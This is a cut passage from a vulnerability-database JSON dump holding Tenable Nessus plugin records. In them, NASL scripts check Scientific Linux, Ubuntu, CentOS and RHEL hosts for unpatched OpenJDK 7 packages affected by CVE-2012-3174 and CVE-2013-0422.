package to IcedTea7 2.3.4.\n\nAll running instances of OpenJDK Java must be restarted for the update\nto take effect.", "edition": 13, "published": "2013-01-17T00:00:00", "title": "Scientific Linux Security Update : java-1.7.0-openjdk on SL5.x, SL6.x i386/x86_64 (20130116)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2013-01-17T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:java-1.7.0-openjdk-src", "p-cpe:/a:fermilab:scientific_linux:java-1.7.0-openjdk-devel", "p-cpe:/a:fermilab:scientific_linux:java-1.7.0-openjdk", "p-cpe:/a:fermilab:scientific_linux:java-1.7.0-openjdk-demo", "p-cpe:/a:fermilab:scientific_linux:java-1.7.0-openjdk-javadoc", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:java-1.7.0-openjdk-debuginfo"], "id": "SL_20130116_JAVA_1_7_0_OPENJDK_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/63607", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63607);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/12\");\n\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n\n script_name(english:\"Scientific Linux Security Update : java-1.7.0-openjdk on SL5.x, SL6.x i386/x86_64 (20130116)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Two improper permission check issues were discovered in the reflection\nAPI in OpenJDK. An untrusted Java application or applet could use\nthese flaws to bypass Java sandbox restrictions. (CVE-2012-3174,\nCVE-2013-0422)\n\nThis erratum also upgrades the OpenJDK package to IcedTea7 2.3.4.\n\nAll running instances of OpenJDK Java must be restarted for the update\nto take effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1301&L=scientific-linux-errata&T=0&P=700\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?208272cf\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java Applet JMX Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:java-1.7.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:java-1.7.0-openjdk-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:java-1.7.0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:java-1.7.0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:java-1.7.0-openjdk-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:java-1.7.0-openjdk-src\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/01/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 6.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"java-1.7.0-openjdk-1.7.0.9-2.3.4.el5_9.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.4.el5_9.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"java-1.7.0-openjdk-demo-1.7.0.9-2.3.4.el5_9.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"java-1.7.0-openjdk-devel-1.7.0.9-2.3.4.el5_9.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.4.el5_9.1\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"java-1.7.0-openjdk-src-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\nif (rpm_check(release:\"SL6\", reference:\"java-1.7.0-openjdk-1.7.0.9-2.3.4.1.el6_3\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.4.1.el6_3\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"java-1.7.0-openjdk-demo-1.7.0.9-2.3.4.1.el6_3\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"java-1.7.0-openjdk-devel-1.7.0.9-2.3.4.1.el6_3\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.4.1.el6_3\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"java-1.7.0-openjdk-src-1.7.0.9-2.3.4.1.el6_3\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.7.0-openjdk / java-1.7.0-openjdk-debuginfo / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T06:39:06", "description": "It was discovered that OpenJDK 7's security mechanism could be\nbypassed via Java applets. If a user were tricked into opening a\nmalicious website, a remote attacker could exploit this to perform\narbitrary code execution as the user invoking the program.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "published": "2013-01-17T00:00:00", "title": "Ubuntu 12.10 : openjdk-7 vulnerabilities (USN-1693-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:openjdk-7-jre-zero", "p-cpe:/a:canonical:ubuntu_linux:icedtea-7-jre-jamvm", "p-cpe:/a:canonical:ubuntu_linux:openjdk-7-jre-headless", "p-cpe:/a:canonical:ubuntu_linux:openjdk-7-jre", "cpe:/o:canonical:ubuntu_linux:12.10", "p-cpe:/a:canonical:ubuntu_linux:icedtea-7-jre-cacao", "p-cpe:/a:canonical:ubuntu_linux:openjdk-7-jre-lib"], "id": "UBUNTU_USN-1693-1.NASL", "href": "https://www.tenable.com/plugins/nessus/63609", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-1693-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63609);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/09/19 12:54:28\");\n\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_xref(name:\"USN\", value:\"1693-1\");\n\n script_name(english:\"Ubuntu 12.10 : openjdk-7 vulnerabilities (USN-1693-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that OpenJDK 7's security mechanism could be\nbypassed via Java applets. If a user were tricked into opening a\nmalicious website, a remote attacker could exploit this to perform\narbitrary code execution as the user invoking the program.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/1693-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java Applet JMX Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:icedtea-7-jre-cacao\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:icedtea-7-jre-jamvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:openjdk-7-jre\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:openjdk-7-jre-headless\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:openjdk-7-jre-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:openjdk-7-jre-zero\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/01/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2013-2019 Canonical, Inc. / NASL script (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.10\", pkgname:\"icedtea-7-jre-cacao\", pkgver:\"7u9-2.3.4-0ubuntu1.12.10.1\")) flag++;\nif (ubuntu_check(osver:\"12.10\", pkgname:\"icedtea-7-jre-jamvm\", pkgver:\"7u9-2.3.4-0ubuntu1.12.10.1\")) flag++;\nif (ubuntu_check(osver:\"12.10\", pkgname:\"openjdk-7-jre\", pkgver:\"7u9-2.3.4-0ubuntu1.12.10.1\")) flag++;\nif (ubuntu_check(osver:\"12.10\", pkgname:\"openjdk-7-jre-headless\", pkgver:\"7u9-2.3.4-0ubuntu1.12.10.1\")) flag++;\nif (ubuntu_check(osver:\"12.10\", pkgname:\"openjdk-7-jre-lib\", pkgver:\"7u9-2.3.4-0ubuntu1.12.10.1\")) flag++;\nif (ubuntu_check(osver:\"12.10\", pkgname:\"openjdk-7-jre-zero\", pkgver:\"7u9-2.3.4-0ubuntu1.12.10.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"icedtea-7-jre-cacao / icedtea-7-jre-jamvm / openjdk-7-jre / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:28:19", "description": "Updated java-1.7.0-openjdk packages that fix two security issues are\nnow available for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 7 Java Runtime Environment and the\nOpenJDK 7 Software Development Kit.\n\nTwo improper permission check issues were discovered in the reflection\nAPI in OpenJDK. An untrusted Java application or applet could use\nthese flaws to bypass Java sandbox restrictions. (CVE-2012-3174,\nCVE-2013-0422)\n\nThis erratum also upgrades the OpenJDK package to IcedTea7 2.3.4.\nRefer to the NEWS file, linked to in the References, for further\ninformation.\n\nAll users of java-1.7.0-openjdk are advised to upgrade to these\nupdated packages, which resolve these issues. All running instances of\nOpenJDK Java must be restarted for the update to take effect.", "edition": 24, "published": "2013-01-17T00:00:00", "title": "CentOS 5 / 6 : java-1.7.0-openjdk (CESA-2013:0165)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2013-01-17T00:00:00", "cpe": ["cpe:/o:centos:centos:6", "p-cpe:/a:centos:centos:java-1.7.0-openjdk-devel", "p-cpe:/a:centos:centos:java-1.7.0-openjdk", "p-cpe:/a:centos:centos:java-1.7.0-openjdk-demo", "cpe:/o:centos:centos:5", "p-cpe:/a:centos:centos:java-1.7.0-openjdk-src", "p-cpe:/a:centos:centos:java-1.7.0-openjdk-javadoc"], "id": "CENTOS_RHSA-2013-0165.NASL", "href": "https://www.tenable.com/plugins/nessus/63581", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0165 and \n# CentOS Errata and Security Advisory 2013:0165 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63581);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_bugtraq_id(57246, 57312);\n script_xref(name:\"RHSA\", value:\"2013:0165\");\n\n script_name(english:\"CentOS 5 / 6 : java-1.7.0-openjdk (CESA-2013:0165)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated java-1.7.0-openjdk packages that fix two security issues are\nnow available for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 7 Java Runtime Environment and the\nOpenJDK 7 Software Development Kit.\n\nTwo improper permission check issues were discovered in the reflection\nAPI in OpenJDK. An untrusted Java application or applet could use\nthese flaws to bypass Java sandbox restrictions. (CVE-2012-3174,\nCVE-2013-0422)\n\nThis erratum also upgrades the OpenJDK package to IcedTea7 2.3.4.\nRefer to the NEWS file, linked to in the References, for further\ninformation.\n\nAll users of java-1.7.0-openjdk are advised to upgrade to these\nupdated packages, which resolve these issues. All running instances of\nOpenJDK Java must be restarted for the update to take effect.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2013-January/019203.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8227c40e\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2013-January/019204.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?051e9c91\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected java-1.7.0-openjdk packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-3174\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java Applet JMX Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.7.0-openjdk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.7.0-openjdk-demo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.7.0-openjdk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.7.0-openjdk-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:java-1.7.0-openjdk-src\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/01/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x / 6.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"java-1.7.0-openjdk-1.7.0.9-2.3.4.el5_9.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"java-1.7.0-openjdk-demo-1.7.0.9-2.3.4.el5_9.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"java-1.7.0-openjdk-devel-1.7.0.9-2.3.4.el5_9.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.4.el5_9.1\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"java-1.7.0-openjdk-src-1.7.0.9-2.3.4.el5_9.1\")) flag++;\n\nif (rpm_check(release:\"CentOS-6\", reference:\"java-1.7.0-openjdk-1.7.0.9-2.3.4.1.el6_3\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"java-1.7.0-openjdk-demo-1.7.0.9-2.3.4.1.el6_3\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"java-1.7.0-openjdk-devel-1.7.0.9-2.3.4.1.el6_3\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.4.1.el6_3\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"java-1.7.0-openjdk-src-1.7.0.9-2.3.4.1.el6_3\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.7.0-openjdk / java-1.7.0-openjdk-demo / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-25T09:14:30", "description": "Updated java-1.7.0-openjdk packages that fix two security issues are\nnow available for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 7 Java Runtime Environment and the\nOpenJDK 7 Software Development Kit.\n\nTwo improper permission check issues were discovered in the reflection\nAPI in OpenJDK. An untrusted Java application or applet could use\nthese flaws to bypass Java sandbox restrictions. (CVE-2012-3174,\nCVE-2013-0422)\n\nThis erratum also upgrades the OpenJDK package to IcedTea7 2.3.4.\nRefer to the NEWS file, linked to in the References, for further\ninformation.\n\nAll users of java-1.7.0-openjdk are advised to upgrade to these\nupdated packages, which resolve these issues. All running instances of\nOpenJDK Java must be restarted for the update to take effect.", "edition": 23, "published": "2013-01-17T00:00:00", "title": "RHEL 5 / 6 : java-1.7.0-openjdk (RHSA-2013:0165)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3174", "CVE-2013-0422"], "modified": "2013-01-17T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-devel", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:6.3", "cpe:/o:redhat:enterprise_linux:5.9", "p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-src", "p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-demo", "p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk", "p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-debuginfo", "cpe:/o:redhat:enterprise_linux:6", "p-cpe:/a:redhat:enterprise_linux:java-1.7.0-openjdk-javadoc"], "id": "REDHAT-RHSA-2013-0165.NASL", "href": "https://www.tenable.com/plugins/nessus/63590", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0165. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63590);\n script_version (\"1.26\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/24\");\n\n script_cve_id(\"CVE-2012-3174\", \"CVE-2013-0422\");\n script_bugtraq_id(57246, 57312);\n script_xref(name:\"RHSA\", value:\"2013:0165\");\n\n script_name(english:\"RHEL 5 / 6 : java-1.7.0-openjdk (RHSA-2013:0165)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated java-1.7.0-openjdk packages that fix two security issues are\nnow available for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThese packages provide the OpenJDK 7 Java Runtime Environment and the\nOpenJDK 7 Software Development Kit.\n\nTwo improper permission check issues were discovered in the reflection\nAPI in OpenJDK. An untrusted Java application or applet could use\nthese flaws to bypass Java sandbox restrictions. (CVE-2012-3174,\nCVE-2013-0422)\n\nThis erratum also upgrades the OpenJDK package to IcedTea7 2.3.4.\nRefer to the NEWS file, linked to in the References, for further\ninformation.\n\nAll users of java-1.7.0-openjdk are advised to upgrade to these\nupdated packages, which resolve these issues. All running instances of\nOpenJDK Java must be restarted for the update to take effect.\"\n );\n # http://icedtea.classpath.org/hg/release/icedtea7-2.3/file/icedtea-2.3.4/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?646d4ea1\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2013:0165\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-3174\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-0422\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Java Applet JMX Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n 